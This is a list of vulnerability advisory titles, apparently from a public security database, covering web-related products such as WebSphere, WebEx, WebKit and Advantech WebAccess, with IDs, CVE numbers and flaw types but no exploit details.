[73560] Webnetwork CVE-2012-0912 SQL-Injection Vulnerability
[73551] Web Patio CVE-2012-2637 Cross-Site Scripting Vulnerability
[73549] Webforum CVE-2011-4172 Cross-Site Scripting Vulnerability
[73524] WEBi CVE-2010-1242 Cross-Site Scripting Vulnerability
[73522] Web Template Software CVE-2010-2510 SQL-Injection Vulnerability
[73460] Mozilla Firefox 'webrtc::VPMContentAnalysis::Release()' Information Disclosure Vulnerability
[73439] Websense TRITON V-Series CVE-2015-2772 Unspecified Arbitrary File Upload Vulnerability
[73435] WebDepo 'wood' Parameter SQL Injection Vulnerability
[73429] Multiple Websense Products CVE-2015-2768 Unspecified Cross Site Scripting Vulnerability
[73428] Multiple Websense Products CVE-2015-2771 Plaintext Credentials Information Disclosure Vulnerability
[73427] Websense TRITON AP-EMAIL CVE-2015-2765 Unspecified Clickjacking Vulnerability
[73426] Websense TRITON AP-EMAIL CVE-2015-2766 Unspecified Security Vulnerability
[73424] Websense TRITON AP-DATA CVE-2015-2764 Multiple HTML Injection Vulnerabilities
[73420] McAfee Email Gateway Secure Web Mail Client Cross Site Scripting Vulnerability
[73418] Websense TRITON AP-EMAIL CVE-2015-2767 Unspecified Security Vulnerability
[73417] Websense TRITON V-Series CVE-2014-9712 Unspecified Arbitrary File Read Vulnerability
[73415] Websense TRITON AP-EMAIL CVE-2015-2763 Unspecified Security Vulnerability
[73414] Websense TRITON AP-WEB CVE-2015-2761 Multiple Cross Site Scripting Vulnerabilities
[73412] Websense TRITON AP-WEB CVE-2015-2762 User Enumeration Weakness
[73407] Appweb CVE-2014-9708 Null Pointer Dereference Denial of Service Vulnerability
[73406] Websense TRITON V-Series CVE-2015-2773 Unspecified Arbitrary File Read Vulnerability
[73404] GoAhead WebServer 'src/http.c' Directory Traversal Vulnerability
[73345] Multiple Websense Products 'Sender address' Field HTML Injection Vulnerability
[73275] IBM Business Process Manager and WebSphere Lombardi Edition Cross Site Scripting Vulnerability
[73244] Cisco WebEx Meetings Server CVE-2015-0668 Cross Site Scripting Vulnerability
[73242] Multiple Websense Products Unspecified Cross Site Scripting Vulnerability
[73241] Multiple Websense Products 'explorer_wse' Path Access Bypass Vulnerability
[73240] Multiple Websense Products Multiple Unspecified Cross Site Scripting Vulnerabilities
[73236] Multiple Websense Products Unspecified Information Disclosure Vulnerability
[73233] Multiple Websense Products 'CommandLineServlet' Servlet Command Injection Vulnerability
[73222] WebGate eDVR Manager CVE-2015-2095 ActiveX Control Remote Heap Buffer Overflow Vulnerability
[73215] Drupal Webform Module Cross Site Scripting Vulnerability
[73072] IBM WebSphere Portal CVE-2015-0177 Unspecified Cross Site Scripting Vulnerability
[73069] IBM WebSphere Portal CVE-2015-0139 Unspecified Cross Site Scripting Vulnerability
[73067] IBM WebSphere Portal CVE-2014-6214 Cross Site Request Forgery Vulnerability
[73063] SuperWebMailer 'defaultnewsletter.php' Cross Site Scripting Vulnerability
[73011] Webshop hun 'index.php' Directory Traversal Vulnerability
[72997] Webshop hun 'index.php' Multiple SQL Injection Vulnerabilities
[72996] Webshop hun 'index.php' Multiple Cross Site Scripting Vulnerabilities
[72993] Drupal Webform Module Multiple Cross Site Scripting Vulnerabilities
[72992] WeBid 'ajax.php' Arbitrary File Upload Vulnerability
[72934] WordPress Google Captcha (reCAPTCHA) by BestWebSoft Plugin Authentication Bypass Vulnerability
[72883] Microsoft Exchange Server Outlook Web Access CVE-2015-1628 Cross Site Scripting Vulnerability
[72857] KENT WEB Clip Board CVE-2015-0888 Arbitrary File Deletion Vulnerability
[72849] WebGate eDVR Manager CVE-2015-2096 ActiveX Control Remote Code Execution Vulnerability
[72843] Multiple WebGate Products CVE-2015-2100 Multiple Remote Stack Based Buffer Overflow Vulnerabilities
[72841] WebGate WinRDS Multiple ActiveX Controls Multiple Stack Buffer Overflow Vulnerabilities
[72839] WebGate WebEyeAudio ActiveX control CVE-2015-2093 Stack Buffer Overflow Vulnerability
[72838] WebGate eDVR Manager ActiveX Controls CVE-2015-2098 Multiple Buffer Overflow Vulnerabilities
[72835] WebGate eDVR Manager CVE-2015-2097 Multiple Stack Buffer Overflow Vulnerabilities
[72834] WebGate Control Multiple ActiveX Controls Multiple Remote Buffer Overflow Vulnerabilities
[72824] Cisco Unified Web Interaction Manager CVE-2015-0655 Cross Site Scripting Vulnerability
[72820] Fortinet FortiMail Web Action Quarantine Release Feature Cross Site Scripting Vulnerability
[72812] Drupal Ubercart Webform Integration Module Multiple Cross Site Scripting Vulnerabilities
[72719] Cisco WebEx Meetings Server CVE-2015-0590 Information Disclosure Vulnerability
[72688] Cisco Web Security Appliance CVE-2015-0628 Remote Security Bypass Vulnerability
[72676] Drupal RESTful Web Services Information Disclosure Vulnerability
[72663] Cisco Web Security Appliance CVE-2015-0623 Cross Site Scripting Vulnerability
[72636] noVNC 'include/webutil.js' Session Hijacking Vulnerability
[72561] Drupal Webform prepopulate block Module Cross Site Scripting Vulnerability
[72493] Cisco WebEx Meetings Server CVE-2015-0589 Command Injection Vulnerability
[72401] Roundcube Webmail CVE-2015-1433 Cross Site Scripting Vulnerability
[72387] Xymon 'web/acknowledge.c' Remote Buffer Overflow Vulnerability
[72373] Cisco WebEx Meetings Server CVE-2015-0597 User Enumeration Vulnerability
[72371] Cisco WebEx Meetings Server CVE-2015-0596 Cross Site Request Forgery Vulnerability
[72370] Cisco WebEx Meetings Server CVE-2015-0595 Information Disclosure Vulnerability
[72331] WebKit CVE-2014-4477 Unspecified Memory Corruption Vulnerability
[72330] WebKit CVE-2014-4479 Unspecified Memory Corruption Vulnerability
[72329] WebKit CVE-2014-4476 Unspecified Memory Corruption Vulnerability
[72301] WebSVN 'dl.php' Arbitrary File Access Vulnerability
[72253] WebGUI Unspecified Cross Site Scripting Vulnerability
[72189] Oracle WebCenter Content CVE-2015-0376 Remote Security Vulnerability
[72135] Oracle WebLogic Server CVE-2014-6569 Remote Security Vulnerability
[72104] WebsiteBaker 'modify.php' Cross Site Scripting Vulnerability
[72068] Clorius Controls A/S Java Web Client CVE-2014-9199 Information Disclosure Vulnerability
[72045] Mozilla Firefox/SeaMonkey Web Audio Denial of Service Vulnerability
[72044] Mozilla Firefox/SeaMonkey WebRTC Memory Corruption Vulnerability
[72012] Cisco WebEx Meetings Server CVE-2015-0583 Information Disclosure Vulnerability
[71982] Cisco WebEx Meetings Server CVE-2014-8036 Security Vulnerability
[71980] Cisco WebEx Meetings Server CVE-2014-8035 User Enumeration Vulnerability
[71978] Cisco WebEx Meetings Server CVE-2014-8034 User Enumeration Vulnerability
[71950] Cisco WebEx Meetings Server CVE-2014-8033 Authentication Bypass Vulnerability
[71947] Cisco WebEx Meetings Server CVE-2014-8032 Encrypted Password Information Disclosure Vulnerability
[71945] Cisco WebEx Meetings Server CVE-2014-8030 Cross Site Scripting Vulnerability
[71943] Cisco WebEx Meetings Server CVE-2014-8031 Cross Site Request Forgery Vulnerability
[71924] Microweber CMS 'Category.php' SQL Injection Vulnerability
[71908] IBM WebSphere Service Registry and Repository CVE-2014-6179 Cross Site Scripting Vulnerability
[71907] IBM WebSphere Service Registry and Repository CVE-2014-6178 Cross Site Scripting Vulnerability
[71906] IBM WebSphere Service Registry and Repository Multiple Cross Site Request Forgery Vulnerabilities
[71905] IBM WebSphere Service Registry and Repository CVE-2014-6186 Security Bypass Vulnerability
[71904] IBM WebSphere Service Registry and Repository CVE-2014-6181 Information Disclosure Vulnerability
[71903] IBM WebSphere Service Registry and Repository CVE-2014-6177 Access Bypass Vulnerability
[71902] IBM WebSphere Service Registry and Repository CVE-2014-6180 HTML Injection Vulnerability
[71901] IBM WebSphere Service Registry and Repository Multiple Cross Site Scripting Vulnerabilities
[71900] IBM WebSphere Service Registry and Repository CVE-2014-6132 Cross Site Scripting Vulnerability
[71899] IBM WebSphere Service Registry and Repository CVE-2014-6153 Information Disclosure Vulnerability
[71898] IBM WebSphere Service Registry and Repository Local Security Bypass Vulnerability
[71897] IBM WebSphere Service Registry and Repository Multiple Directory Traversal Vulnerabilities
[71863] Zarafa WebAccess and WebApp CVE-2014-9465 Multiple Denial of Service Vulnerabilities
[71858] Social Microblogging PRO 'Web Site' Field HTML Injection Vulnerability
[71837] IBM WebSphere Application Server CVE-2014-6164 Information Disclosure Vulnerability
[71836] IBM WebSphere Application Server XML External Entity Information Disclosure Vulnerability
[71834] IBM WebSphere Application Server CVE-2014-8890 Remote Privilege Escalation Vulnerability
[71827] Graylog2 CVE-2014-9217 LDAP Authentication Bypass Vulnerability
[71728] IBM WebSphere Portal CVE-2014-6215 Unspecified Cross Site Scripting Vulnerability
[71628] Drupal Piwik Web Analytics Module Information Disclosure Vulnerability
[71620] Symantec Web Gateway CVE-2014-7285 Command Injection Vulnerability
[71607] Multiple Asterisk Products WebSocket Server Denial of Service Vulnerability
[71472] Drupal Webform Invitation Module Cross Site Scripting Vulnerability
[71464] WebKit CVE-2014-1748 Unspecified UI Spoofing Vulnerability
[71462] WebKit CVE-2014-4470 Unspecified Memory Corruption Vulnerability
[71461] WebKit CVE-2014-4469 Unspecified Memory Corruption Vulnerability
[71459] WebKit CVE-2014-4468 Unspecified Memory Corruption Vulnerability
[71451] WebKit CVE-2014-4475 Unspecified Memory Corruption Vulnerability
[71449] WebKit CVE-2014-4474 Unspecified Memory Corruption Vulnerability
[71445] WebKit CVE-2014-4466 Unspecified Memory Corruption Vulnerability
[71444] WebKit CVE-2014-4473 Memory Corruption Vulnerability
[71442] WebKit CVE-2014-4472 Memory Corruption Vulnerability
[71441] Microsoft Exchange Server Outlook Web Access CVE-2014-6326 Cross Site Scripting Vulnerability
[71440] Microsoft Exchange Server Outlook Web Access CVE-2014-6325 Cross Site Scripting Vulnerability
[71438] WebKit CVE-2014-4471 Unspecified Memory Corruption Vulnerability
[71358] IBM WebSphere Portal CVE-2014-6093 Unspecified Cross Site Scripting Vulnerability
[71276] WebsiteBaker Multiple Security Vulnerabilities
[71259] RETIRED: Mozilla Firefox WEBM File Handling Integer Overflow Vulnerability
[71193] Advantech WebAccess CVE-2014-8388 Stack Based Buffer Overflow Vulnerability
[71144] WebKit CVE-2014-4459 Unspecified Memory Corruption Vulnerability
[71142] WebKit CVE-2014-4462 Unspecified Memory Corruption Vulnerability
[71137] WebKit CVE-2014-4452 Unspecified Memory Corruption Vulnerability
[71096] Drupal Webform Component Roles Module Access Bypass Vulnerability
[71093] Direct Web Remoting CVE-2014-5325 XML External Entity Injection Vulnerability
[71031] SAP HANA Web-based Development Workbench CVE-2014-8667 Cross Site Scripting Vulnerability
[71024] SAP Network Interface Router CVE-2014-8589 Denial of Service Vulnerability
[70964] Trend Micro InterScan Web Security Virtual Appliance Multiple Information Disclosure Vulnerabilities
[70955] RSA Web Threat Detection CVE-2014-4627 SQL Injection Vulnerability
[70872] IBM WebSphere Commerce CVE-2014-4769 XML External Entity Information Disclosure Vulnerability
[70870] IBM WebSphere Commerce CVE-2014-4834 XML External Entity Denial of Service Vulnerability
[70859] Scalix Web Access Mail Administration Login Panel Cross Site Scripting Vulnerability
[70857] Scalix Web Access XML External Entity Injection Vulnerability
[70849] Cisco Unified Communications Manager Admin Interface Multiple Cross Site Scripting Vulnerabilities
[70846] Cisco Unified Communications Manager Reports Interface Multiple Cross Site Scripting Vulnerabilities
[70759] IBM WebSphere Portal CVE-2014-6125 Cross Site Request Forgery Vulnerability
[70758] IBM WebSphere Portal CVE-2014-4814 Unspecified Denial of Service Vulnerability
[70757] IBM WebSphere Portal CVE-2014-4808 Unspecified Remote Code Execution Vulnerability
[70756] IBM WebSphere Portal CVE-2014-6126 Unspecified Cross Site Scripting Vulnerability
[70755] IBM WebSphere Portal CVE-2014-4821 Information Disclosure Vulnerability
[70700] Webasuyst Shop-Script 'phone number' Field HTML Injection Vulnerability
[70684] WebPromoExperts For Android SSL Certificate Validation Security Bypass Vulnerability
[70593] Panasonic Network Camera View WebVideoCam ActiveX Remote Code Execution Vulnerability
[70588] IBM WebSphere MQ CVE-2014-4822 Local Information Disclosure Vulnerability
[70582] IBM WebSphere Application Server CVE-2014-3021 Unspecified Information Disclosure Vulnerability
[70463] Oracle WebLogic Server CVE-2014-6499 Remote Security Vulnerability
[70449] Oracle WebLogic Server CVE-2014-6534 Remote Security Vulnerability
[70421] IBM WebSphere MQ CVE-2014-6116 Authentication Bypass Vulnerability
[70322] IBM WebSphere Portal CVE-2014-4761 Information Disclosure Vulnerability
[70283] IBM Security Access Manager for Web CVE-2014-4809 Remote Denial of Service Vulnerability
[70274] Nessus Web UI CVE-2014-7280 HTML Injection Vulnerability
[70271] IBM WebSphere DataPower XC10 Appliance CVE-2014-3060 Local Information Disclosure Vulnerability
[70270] IBM WebSphere MQ CVE-2014-4793 Security Bypass Vulnerability
[70269] IBM WebSphere DataPower XC10 Appliance CVE-2014-3059 Local Information Disclosure Vulnerability
[70268] BMC Track-It! '/TrackItWeb/Grid/GetData' SQL Injection Vulnerability
[70255] Allomani Weblinks Multiple SQL Injection and Multiple Cross Site Scripting Vulnerabilities
[70254] AutoWeb 'noticias.php' SQL Injection Vulnerability
[70239] IBM WebSphere Application Server CVE-2014-6174 Clickjacking Vulnerability
[70234] Cisco WebEx Meetings Server CVE-2014-3400 Information Disclosure Vulnerability
[70222] Google Android API WebView Component CVE-2014-7224 Remote Code Execution Vulnerability
[70181] Cisco WebEx Meetings Server CVE-2014-3395 Arbitrary File Download Vulnerability
[70175] Bacula-web 'joblogs.php' SQL Injection Vulnerability
[70104] Symfony Web Profiler Cross Site Request Forgery Vulnerability
[70050] Netgear WNR500 Router 'webproc' Local File Include Vulnerability
[69984] WebKit CVE-2013-6663 Use-After-Free Multiple Memory Corruption Vulnerabilities
[69981] IBM WebSphere Application Server CVE-2014-4770 Cross Site Scripting Vulnerability
[69980] IBM WebSphere Application Server CVE-2014-4816 Cross Site Request Forgery Vulnerability
[69976] WebKit CVE-2014-4415 Unspecified Memory Corruption Vulnerability
[69975] WebKit CVE-2014-4414 Unspecified Memory Corruption Vulnerability
[69973] WebKit CVE-2014-4412 Unspecified Memory Corruption Vulnerability
[69970] WebKit CVE-2014-4411 Unspecified Memory Corruption Vulnerability
[69966] WebKit CVE-2014-4410 Unspecified Memory Corruption Vulnerability
[69937] WebKit Private Browsing CVE-2014-4409 Security Bypass Vulnerability
[69900] Exsoul Web Browser for Android SSL Certificate Validation Security Bypass Vulnerability
[69899] Web Browser &
[69883] webEdition 'file' Parameter Directory Traversal Vulnerability
[69881] RETIRED: WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[69875] IBM Websphere Message Broker and Integration Bus CVE-2014-4819 Information Disclosure Vulnerability
[69739] Cisco Unified Communications Manager Web Framework Cross Site Scripting Vulnerability
[69735] Cisco IOS XR Software Command Line Interface (CLI) Information Disclosure Vulnerability
[69734] IBM WebSphere Portal CVE-2014-4792 Arbitrary File Upload Vulnerability
[69733] IBM WebSphere Portal CVE-2014-4762 Unspecified Cross Site Scripting Vulnerability
[69556] McAfee Web Gateway CVE-2014-6064 Information Disclosure Vulnerability
[69553] MyWebSQL 'index.php' Cross Site Scripting Vulnerability
[69547] IBM Business Process Manager and WebSphere CVE-2014-3075 Arbitrary File Upload Vulnerability
[69540] IBM Business Process Manager and WebSphere CVE-2014-4758 Security Bypass Vulnerability
[69538] Advantech WebAccess CVE-2014-0992 Stack Based Buffer Overflow Vulnerability
[69536] Advantech WebAccess CVE-2014-0991 Stack Based Buffer Overflow Vulnerability
[69535] Advantech WebAccess CVE-2014-0990 Incomplete Fix Stack-Based Buffer Overflow Vulnerability
[69534] Advantech WebAccess CVE-2014-0989 Incomplete Fix Stack-Based Buffer Overflow Vulnerability
[69533] Advantech WebAccess CVE-2014-0988 Incomplete Fix Stack-Based Buffer Overflow Vulnerability
[69532] Advantech WebAccess CVE-2014-0987 Incomplete Fix Stack Based Buffer Overflow Vulnerability
[69531] Advantech WebAccess CVE-2014-0986 Incomplete Fix Stack Based Buffer Overflow Vulnerability
[69529] Advantech WebAccess CVE-2014-0985 Incomplete Fix Stack Based Buffer Overflow Vulnerability
[69516] WordPress Video Posts Webcam Recorder Plugin 'r_logout.php' Cross Site Scripting Vulnerability
[69394] Aruba Networks Web Management Portal CVE-2014-2592 Arbitrary File Upload Vulnerability
[69384] Barracuda Networks Web Security Flex Multiple HTML Injection Vulnerabilities
[69382] Barracuda Networks Web Security Flex Multiple HTML Injection Vulnerabilities
[69369] Zarafa WebAccess and WebApp '/tmp' Directory Multiple Local Information Disclosure Vulnerabilities
[69362] Zarafa WebAccess and WebApp Incomplete Fix Multiple Local Information Disclosure Vulnerabilities
[69298] IBM WebSphere Application Server CVE-2014-3083 Unspecified Information Disclosure Vulnerability
[69297] IBM WebSphere Application Server CVE-2014-4767 Security Bypass Vulnerability
[69296] IBM WebSphere Application Server CVE-2014-3070 Security Bypass Vulnerability
[69291] OpenStack Horizon Host Aggregates Interface CVE-2014-3594 HTML Injection Vulnerability
[69285] Cisco Webex MeetMeNow CVE-2014-3340 Local Directory Traversal Vulnerability
[69223] WebKit APPLE-SA-2014-08-13-1 Multiple Unspecified Memory Corruption Vulnerabilities
[69218] IBM WebSphere DataPower SOA Appliances CVE-2014-0852 Information Disclosure Vulnerability
[69183] IBM WebSphere Real Time CVE-2014-3086 Unspecified Privilege Escalation Vulnerability
[69171] Easy File Sharing Web Server Multiple HTML Injection Vulnerabilities
[69047] IBM WebSphere Portal CVE-2014-4760 Open Redirection Vulnerability
[69045] IBM WebSphere Portal CVE-2014-3102 Unspecified Cross Site Scripting Vulnerability
[69044] IBM WebSphere Portal CVE-2014-4746 Information Disclosure Vulnerability
[69042] IBM WebSphere Portal CVE-2014-0953 Unspecified Cross Site Scripting Vulnerability
[69034] IBM Embedded WebSphere Application Server CVE-2014-3020 Local Privilege Escalation Vulnerability
[69028] Barracuda Web Application Firewall CVE-2014-2595 Authentication Bypass Vulnerability
[68931] Web Encryption Extension Unspecified Remote Code Execution Vulnerability
[68929] IBM WebSphere Portal CVE-2014-3055 SQL Injection Vulnerability
[68928] IBM WebSphere Portal CVE-2014-3057 Cross Site Scripting Vulnerability
[68925] IBM WebSphere Portal Unified Task List Portlet Information Disclosure Vulnerability
[68924] IBM WebSphere Portal CVE-2014-3054 Open Redirection Vulnerability
[68911] Cisco WebEx Meetings Server CVE-2014-3304 Information Disclosure Vulnerability
[68910] Cisco WebEx Meetings Server CVE-2014-3303 Information Disclosure Vulnerability
[68904] Cisco WebEx Meetings Server 'user.php' Information Disclosure Vulnerability
[68903] Cisco WebEx Meetings Server CVE-2014-3305 Cross Site Request Forgery Vulnerability
[68894] Cisco WebEx Meetings Server CVE-2014-3301 Information Disclosure Vulnerability
[68877] Cisco Security Manager Web Framework CVE-2014-3326 SQL Injection Vulnerability
[68876] Siemens SIMATIC WinCC And PCS7 WebNavigator Server Information Disclosure Vulnerability
[68838] Honeywell FALCON XLWeb Controllers Multiple Unspecified Cross Site Scripting Vulnerabilities
[68837] Honeywell FALCON XLWeb Controllers CVE-2014-2717 Authentication Bypass Vulnerability
[68828] Barracuda Web Filter HTML Injection Vulnerability
[68782] Nessus Web UI CVE-2014-4980 Information Disclosure Vulnerability
[68718] Advantech WebAccess CVE-2014-2365 Remote Code Execution Vulnerability
[68717] Advantech WebAccess CVE-2014-2366 Remote Information Disclosure Vulnerability
[68716] Advantech WebAccess CVE-2014-2367 Remote Authentication Bypass Vulnerability
[68715] Advantech WebAccess CVE-2014-2368 Unsafe ActiveX Control Remote Security Weakness
[68714] Advantech WebAccess CVE-2014-2364 Multiple Remote Stack Based Buffer Overflow Vulnerabilities
[68682] Open Web Analytics Multiple Cross Site Scripting and Remote File Include Vulnerabilities
[68680] IPython Notebook Websocket Hijacking Remote Code Execution Vulnerability
[68675] Boat Browser WebView Class CVE-2014-4968 Remote Code Execution Vulnerability
[68658] WEBMIS CMS Arbitrary File Upload Vulnerability
[68649] Oracle WebLogic Server CVE-2014-4241 Remote Security Vulnerability
[68644] Oracle WebLogic Server CVE-2014-4217 Remote Security Vulnerability
[68641] Oracle WebLogic Server CVE-2014-4242 Remote Security Vulnerability
[68634] Oracle WebLogic Server CVE-2014-4253 Remote Security Vulnerability
[68629] Oracle WebLogic Server CVE-2014-4210 Remote Security Vulnerability
[68623] Oracle WebLogic Server CVE-2014-4202 Remote Security Vulnerability
[68616] Oracle WebLogic Server CVE-2014-4201 Remote Security Vulnerability
[68609] Oracle WebCenter Portal CVE-2014-4211 Remote Security Vulnerability
[68597] Oracle WebLogic Server CVE-2014-4267 Remote Security Vulnerability
[68594] Oracle WebLogic Server CVE-2014-2479 Remote Security Vulnerability
[68591] Oracle WebLogic Server CVE-2014-4254 Remote Security Vulnerability
[68589] Oracle WebLogic Server CVE-2014-4256 Remote Security Vulnerability
[68575] Oracle WebLogic Server CVE-2014-4255 Remote Security Vulnerability
[68570] Oracle WebLogic Server CVE-2014-2480 Remote Security Vulnerability
[68567] Oracle WebLogic Server CVE-2014-2481 Remote Security Vulnerability
[68563] Oracle WebCenter Portal CVE-2014-4257 Remote Security Vulnerability
[68548] Juniper Junos SRX Web Authentication Cross Site Scripting Vulnerability
[68532] Puffin Web Browser for Android Address Bar Spoofing Vulnerability
[68528] Fortinet Fortiweb Multiple Cross Site Scripting Vulnerabilities
[68519] WeBid Multiple Cross Site Scripting And LDAP Injection Vulnerabilities
[68503] Cisco WebEx Meetings Client File Transfer Functionality Arbitrary File Download Vulnerability
[68502] Cisco WebEx Meetings Client File Sharing Functionality Remote Heap Buffer Overflow Vulnerability
[68485] WAGO-I/O-System CODESYS WebVisu Password Information Disclosure Vulnerability
[68418] Symbiose Webos 'path' Parameter Cross Site Scripting Vulnerability
[68331] Cisco Unified Communications Domain Manager BVSMWeb CVE-2014-3300 Security Bypass Vulnerability
[68329] WebKit CVE-2014-1369 Information Disclosure Vulnerability
[68275] WebKit CVE-2014-1340 Unspecified Memory Corruption Vulnerability
[68271] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[68258] Google Android API WebView Component CVE-2012-6636 Arbitrary Code Execution Vulnerability
[68247] Zarafa WebAccess and WebApp Local Information Disclosure Vulnerability
[68211] IBM WebSphere Application Server CVE-2014-3022 Unspecified Information Disclosure Vulnerability
[68210] IBM WebSphere Application Server CVE-2014-0965 Unspecified Information Disclosure Vulnerability
[68187] Intercom Web Kyukincho V3 CVE-2014-3881 Unspecified Cross Site Request Forgery Vulnerability
[68186] Intercom Web Kyukincho V3 CVE-2014-2006 Unspecified Cross Site Scripting Vulnerability
[68180] WordPress TimThumb WebShot Feature Arbitrary Code Execution Vulnerability
[68146] Alaya Webdav Server Unspecified Security Bypass Vulnerability
[68132] IBM Security Access Manager for Web and Mobile CVE-2014-3053 Authentication Bypass Vulnerability
[68131] Webmin Usermin CVE-2014-3883 Remote Command Injection Vulnerability
[68129] Webmin CVE-2014-3886 Cross Site Scripting Vulnerability
[68118] Cisco WebEx Meetings Server CVE-2014-3296 Information Disclosure Vulnerability
[68090] web2Project CVE-2014-3119 Multiple SQL Injection Vulnerabilities
[68065] T-Mobile webConnect Manager sysauth Cookie Information Disclosure Weakness
[68063] Cisco Adaptive Security Appliance WebVPN Portal Information Disclosure Vulnerability
[68011] IBM WebSphere Portal CVE-2014-0910 Cross Site Scripting Vulnerability
[68001] Cisco WebEx Meetings Server CVE-2014-3294 Information Disclosure Vulnerability
[68000] Cisco Unified Communications Manager Java Interface SQL Injection Vulnerability
[67924] Cisco Unified Communications Domain Manager BVSMWeb User Enumeration Vulnerability
[67922] Cisco WebEx Meeting Server CVE-2014-3286 User Enumeration Vulnerability
[67921] WebTitan 4.01 Multiple Security Vulnerabilities
[67830] IPSwitch IMail Server WEB client Multiple HTML Injection Vulnerabilities
[67790] Opera Web Browser Prior to 22.0 Multiple Unspecified Security Vulnerabilities
[67775] WordPress Query Interface Plugin Unspecified Security Bypass Vulnerability
[67755] Symantec Web Gateway CVE-2014-1652 Multiple Cross Site Scripting Vulnerabilities
[67754] Symantec Web Gateway CVE-2014-1651 SQL Injection Vulnerability
[67753] Symantec Web Gateway CVE-2014-1650 SQL Injection Vulnerability
[67752] Symantec Web Gateway CVE-2013-5017 'SNMPConfig.php' Remote Command Injection Vulnerability
[67720] IBM WebSphere Application Server CVE-2013-6323 Cross Site Scripting Vulnerability
[67704] WebCalendar CVE-2013-1421 HTML Injection Vulnerability
[67697] Drupal Webserver authentication Module Security Bypass Weakness
[67692] webEdition CMS 'setup.php' CVE-2014-2302 Remote Command Execution Vulnerability
[67689] webEdition CMS 'we_fs.php' CVE-2014-2303 SQL Injection Vulnerability
[67652] IBM WebSphere Service Registry And Repository Unspecified Cross Site Scripting Vulnerability
[67649] Webmin Usermin Popup Windows Multiple Cross Site Scripting Vulnerabilities
[67647] Webmin Multiple Unspecified Cross Site Scripting Vulnerabilities
[67644] SOS Webpages CVE-2014-3445 Unauthorized Access Vulnerability
[67598] IBM Sametime Proxy Server and Web Client CVE-2014-3015 Cross Site Request Forgery Vulnerability
[67579] IBM WebSphere Application Server CVE-2014-0891 Information Disclosure Vulnerability
[67572] WebKit CVE-2014-1731 Unspecified Memory Corruption Vulnerability
[67569] Cisco Security Manager Web Framework Cross Site Scripting Vulnerability
[67555] Cisco Identity Services Engine Web Framework CVE-2014-3275 SQL Injection Vulnerability
[67554] WebKit CVE-2014-1346 Cross-Origin Security Bypass Vulnerability
[67553] WebKit Multiple Unspecified Memory Corruption Vulnerabilities
[67542] Easy File Management Web Server Stack Buffer Overflow Vulnerability
[67540] Easy Address Book Web Server Stack Buffer Overflow Vulnerability
[67495] Cisco Unified Web and E-Mail Interaction Manager Session Identifiers Security Bypass Vulnerability
[67464] Cisco Unified Web and E-Mail Interaction Manager CVE-2014-2192 Cross Site Scripting Vulnerability
[67458] Cisco Unified Web and E-Mail Interaction Manager XML External Entity Injection Vulnerability
[67438] UPS Web/SNMP-Manager CS121 Authentication Bypass Vulnerability
[67424] Cisco WebEx Business Suite 'meetinginfo.do' Information Disclosure Vulnerability
[67421] IBM WebSphere Portal CVE-2014-0954 Unspecified Security Bypass Vulnerability
[67419] IBM WebSphere Portal 'boot_config.jsp' Cross Site Scripting Vulnerability
[67418] IBM WebSphere Portal CVE-2014-0959 Denial of Service Vulnerability
[67417] IBM WebSphere Portal CVE-2014-0956 Cross Site Scripting Vulnerability
[67415] IBM WebSphere Portal 'Social Rendering' Feature Cross Site Scripting Vulnerability
[67414] IBM WebSphere Portal CVE-2014-0958 Open Redirection Vulnerability
[67413] IBM WebSphere Portal CVE-2014-0949 Unspecified Denial of Service Vulnerability
[67412] IBM WebSphere Portal 'FilterForm.jsp' Cross Site Scripting Vulnerability
[67411] IBM WebSphere Commerce CVE-2014-0943 Denial of Service Vulnerability
[67406] Easy File Sharing Web Server Stack Buffer Overflow Vulnerability
[67398] Microsoft Debug Interface Access SDK 'msdia.dll' Memory Corruption Vulnerability
[67335] IBM WebSphere Application Server CVE-2014-0859 Denial of Service Vulnerability
[67329] IBM WebSphere Application Server CVE-2014-0823 Arbitrary File Disclosure Vulnerability
[67328] IBM WebSphere Application Server Liberty Profile CVE-2014-0896 Information Disclosure Vulnerability
[67327] IBM WebSphere Application Server CVE-2014-0857 Unspecified Information Disclosure Vulnerability
[67322] IBM WebSphere Application Server CVE-2014-0964 Denial of Service Vulnerability
[67290] Microsoft Office Web Apps CVE-2014-1813 Remote Code Execution Vulnerability
[67269] Red Hat JBoss Web Framework Kit Multiple Cross Site Scripting Vulnerabilities
[67264] Cisco WebEx ARF Player CVE-2014-2136 Memory Corruption Vulnerability
[67262] Cisco WebEx ARF Player CVE-2014-2135 Memory Corruption Vulnerability
[67261] Cisco WebEx ARF Player LZW Decompress Memory Corruption Vulnerability
[67260] Cisco WebEx WRF Player WRF File Heap Overflow Vulnerability
[67259] Cisco WebEx WRF and ARF Players CVE-2014-2132 Out of Bound Read Denial of Service Vulnerability
[67238] IBM Security Access Manager for Web CVE-2014-0963 Remote Denial of Service Vulnerability
[67237] Opera Web Browser Prior to 21.00 Multiple Unspecified Security Vulnerabilities
[67235] Fortinet FortiWeb CVE-2014-3115 Multiple Cross Site Request Forgery Vulnerabilities
[67209] StarTeam Web Server 'performCheckoutFile()' Function Information Disclosure Vulnerability
[67207] IBM WebSphere MQ 'inetd' Process Denial of Service Vulnerability
[67182] Netty 'WebSocket08FrameDecoder' Class Denial of Service Vulnerability
[67143] Cisco WebEx Meetings Server CVE-2014-2186 Cross Site Request Forgery Vulnerability
[67058] Acunetix Web Vulnerability Scanner Remote Stack Buffer Overflow Vulnerability
[67056] InduSoft Web Studio CVE-2014-0780 Directory Traversal Vulnerability
[66926] ZNC 'CWebAdminMod::ChanPage()' Function Denial of Service Vulnerability
[66925] WebTitan Multiple Security Vulnerabilities
[66922] Xerox DocuShare '/docushare/dsweb/ResultBackgroundJobMultiple/1' SQL Injection Vulnerability
[66838] Oracle WebCenter Portal CVE-2014-0450 Information Disclosure Vulnerability
[66825] Oracle WebLogic Server CVE-2014-2470 Remote Security Vulnerability
[66806] Microweber Cross Site Request Forgery Vulnerability
[66804] MicroWorld Technologies eScan Web Management 'pass' Parameter Remote Command Injection Vulnerability
[66770] Juniper Junos J-Web CVE-2014-2711 HTML Injection Vulnerability
[66767] Juniper Junos J-Web CVE-2014-2712 Multiple Cross Site Scripting Vulnerabilities
[66760] Juniper Junos SRX Series Enhanced Web Filtering CVE-2014-2714 Denial of Service Vulnerability
[66750] Advantech WebAccess CVE-2014-0771 Information Disclosure Vulnerability
[66749] Advantech WebAccess CVE-2014-0772 Information Disclosure Vulnerability
[66742] Advantech WebAccess CVE-2014-0773 Security Bypass Vulnerability
[66740] Advantech WebAccess CVE-2014-0763 SQL Injection Vulnerability
